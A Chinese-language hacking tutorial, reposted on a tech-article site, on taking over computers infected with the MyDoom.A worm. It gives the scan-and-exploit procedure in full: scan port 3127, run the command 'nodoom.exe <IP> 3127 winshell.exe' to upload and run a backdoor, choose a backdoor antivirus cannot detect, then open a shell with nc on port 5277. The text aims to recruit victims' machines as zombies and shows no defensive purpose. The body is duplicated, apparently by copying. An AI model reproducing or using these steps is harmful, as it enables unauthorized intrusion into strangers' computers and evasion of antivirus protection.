【标 题】:利用MyDoom.A蠕虫获取系统权限
【关键字】:系统,权限,蠕虫,My,Do,MyDoom
【来 源】:网络
大名鼎鼎的MyDoom.A相信有留意病毒的朋友都有注意吧,短短几天,只是单纯地利用邮件传播,但是几天功夫竟然在全球迅速传播开了,更在几天之内,更产生了变种,实在是不得不说一声佩服啊。
而且,过了几天我就在一个外国的网站找到了溢出MyDoomd.A的exploit和编译好的溢出程序的。感觉现在利用病毒或者蠕虫来找肉鸡十分流行。例如前一段时间的爱之门,只要扫描20168端口就可以拿到一个具有admin权限的shell。话说我拿到溢出程序后,又利用google找到了MyDoom的扫描器,在测试一下,发现这个蠕虫的泛滥情况的确十分严重,我随意地扫了一个ip段,就有N多地机器中了这个蠕虫,从win98到winxp,都有!根据我和QQ上的一位好友测试,据说他还找到了中了win2003的,实在是对我们国内的安全情况感到无语啊,
好了,废话就不多说了,打开CMD,cd到存放溢出MyDoom.A的文件夹那里,运行溢出程序,界面如图1
看就明白怎么用了,呵呵,非常简单。不过在溢出之前,倒也要扫描器扫扫,其实我们只要用superscan扫3127端口也可以得到很多的扫描结果,只是我比较喜欢用专用的扫描器而已,打开扫描器,界面如图
大家所看到的是我已经扫描完毕的结果了,显示VULNERABLE的,就是可以溢出的。我们现在开始来试试。
直接提交nodoom.exe XXX.159.95.112 3127 winshell.exe ,其中winshell就是我们要传输的后门,你也可以换成其他的,不过最好是换成杀毒软件暂时不可以查杀的后门,不然……
呵呵,后果可想而知。Ok,提示文件传输完成,而且并运行后,直接连接后门了,我的是默认端口,所以直接用nc连接5277端口。呵呵,看来是一台xp啊,图
得到shell后,我们可以执行任何的命令了,不过这个就不在本文的讨论范围了。
【关键字】:系统,权限,蠕虫,My,Do,MyDoom
【来 源】:网络
利用MyDoom.A蠕虫获取系统权限
而且,过了几天我就在一个外国的网站找到了溢出MyDoomd.A的exploit和编译好的溢出程序的。感觉现在利用病毒或者蠕虫来找肉鸡十分流行。例如前一段时间的爱之门,只要扫描20168端口就可以拿到一个具有admin权限的shell。话说我拿到溢出程序后,又利用google找到了MyDoom的扫描器,在测试一下,发现这个蠕虫的泛滥情况的确十分严重,我随意地扫了一个ip段,就有N多地机器中了这个蠕虫,从win98到winxp,都有!根据我和QQ上的一位好友测试,据说他还找到了中了win2003的,实在是对我们国内的安全情况感到无语啊,
好了,废话就不多说了,打开CMD,cd到存放溢出MyDoom.A的文件夹那里,运行溢出程序,界面如图1
看就明白怎么用了,呵呵,非常简单。不过在溢出之前,倒也要扫描器扫扫,其实我们只要用superscan扫3127端口也可以得到很多的扫描结果,只是我比较喜欢用专用的扫描器而已,打开扫描器,界面如图
大家所看到的是我已经扫描完毕的结果了,显示VULNERABLE的,就是可以溢出的。我们现在开始来试试。
直接提交nodoom.exe XXX.159.95.112 3127 winshell.exe ,其中winshell就是我们要传输的后门,你也可以换成其他的,不过最好是换成杀毒软件暂时不可以查杀的后门,不然……
呵呵,后果可想而知。Ok,提示文件传输完成,而且并运行后,直接连接后门了,我的是默认端口,所以直接用nc连接5277端口。呵呵,看来是一台xp啊,图
得到shell后,我们可以执行任何的命令了,不过这个就不在本文的讨论范围了。
【相关文章】
对Mydoom.a的shimgapi.dll的分析 一
对Mydoom.a的shimgapi.dll的分析 二
利用API缺陷实现权限提升
如何杀掉本地和远程NT系统进程 一
如何杀掉本地和远程NT系统进程 二
入侵xp系统之初步攻略
Windows下生成shell的一种新方法
解析Windows2000的IDT扩展机制
匿名用户入侵NT获得Admin权限
从UNIX系统获取密码档(三)
【随机文章】
教你制作“闻味的小狗”动画
Vista掀“完美风暴”席卷程序开发
Java 访问数据库的速度瓶颈问题的分析及解决(2)
(转载)Linux 2.4.x 网络安全框架
linux下的网络配置工具——iproute
MP3不能导入FLASH的教程
神州6号发射成功了--庆祝一下
Photoshop高级图层技巧进阶篇(下)
J2EE系统优化的几点体会
总体了解C#(14.参数修饰符)
【相关评论】
没有相关评论
【发表评论】
|